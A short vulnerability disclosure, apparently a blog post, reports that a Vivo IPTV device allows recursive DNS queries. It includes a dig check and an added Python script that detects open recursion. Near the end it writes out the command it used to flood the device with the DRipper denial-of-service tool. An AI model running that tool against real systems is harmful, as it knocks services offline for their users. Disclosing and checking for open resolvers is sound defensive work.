A recursive DNS lookup occurs when a DNS server communicates with several other DNS servers to look up an IP address and return it to the client.
Allowing recursive DNS queries against open DNS servers creates a security vulnerability, as this configuration could allow attackers to perform DNS amplification attacks.
While analyzing and identifying the device's technologies, we found that it uses the recursive method in DNS, which enables denial-of-service attacks.
IPTV Device Tested:
Firmware Tested: 2023.04.04.01.06.15
The IP 192.168.15.250 that will be shown throughout the article is the IP of Vivo’s IPTV physical device.
Identified the enabled recursive method:
dig google.com A @192.168.15.250
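The same check as the dig command above, scripted for auditing a device; this is an added example, not code from the original article or from the exploit it used. It sends a query with the recursion-desired bit set and reads the RA flag, response code and answer count from the reply; the function names and the two sample replies (using the documentation address 192.0.2.1) are constructed for illustration.

```python
import socket
import struct

def build_query(name, qtype=1, txid=0x1234):
    """Build a DNS query for `name` with the RD (recursion desired) bit set."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(p)]) + p.encode("ascii") for p in labels) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)  # class IN

def parse_header(message):
    """Extract the header fields that matter for a recursion check."""
    if len(message) < 12:
        raise ValueError("truncated DNS message")
    txid, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", message[:12])
    return {"txid": txid, "qr": bool(flags & 0x8000), "ra": bool(flags & 0x0080),
            "rcode": flags & 0x000F, "ancount": ancount}

def allows_recursion(query, response):
    """True when the reply matches the query, advertises RA and carries answers."""
    q, r = parse_header(query), parse_header(response)
    if not r["qr"] or r["txid"] != q["txid"]:
        return False  # not a reply to our query
    return bool(r["ra"] and r["rcode"] == 0 and r["ancount"] > 0)

def probe(server, name="google.com", timeout=3.0):
    """Send one query over UDP/53 and report whether the server recursed for us."""
    query = build_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(query, (server, 53))
        response, _ = s.recvfrom(4096)
    return allows_recursion(query, response)

# Constructed sample replies, so the logic can be exercised offline.
QUERY = build_query("google.com")
_A_RECORD = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + bytes([192, 0, 2, 1])
# QR=1, RD=1, RA=1, NOERROR, one answer: the server resolved the name for us.
OPEN_REPLY = QUERY[:2] + struct.pack("!HHHHH", 0x8180, 1, 1, 0, 0) + QUERY[12:] + _A_RECORD
# QR=1, RD=1, RA=0, REFUSED, no answers: recursion is not offered to this client.
REFUSED_REPLY = QUERY[:2] + struct.pack("!HHHHH", 0x8105, 1, 0, 0, 0) + QUERY[12:]

if __name__ == "__main__":
    print("open reply    ->", allows_recursion(QUERY, OPEN_REPLY))
    print("refused reply ->", allows_recursion(QUERY, REFUSED_REPLY))
```

Calling `probe()` from a network segment that should not have resolver access shows whether the device answers recursive queries from there; a REFUSED reply or no reply is the expected result once recursion is restricted.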
Used Exploit:
PoC:
Accessing some functionality of the device (Netflix, for example):
Carrying out the attack:
python3 DRipper.py -s 192.168.15.250 -t 135 -p 53
System down after performing the attack:
Impact:
In the amplification technique, the attacker sends a spoofed request that asks for a very long response. The server will receive a barrage of long and unwanted DNS responses that can interrupt or even crash the IPTV device.
My LinkedIn: https://www.linkedin.com/in/lucas-fp/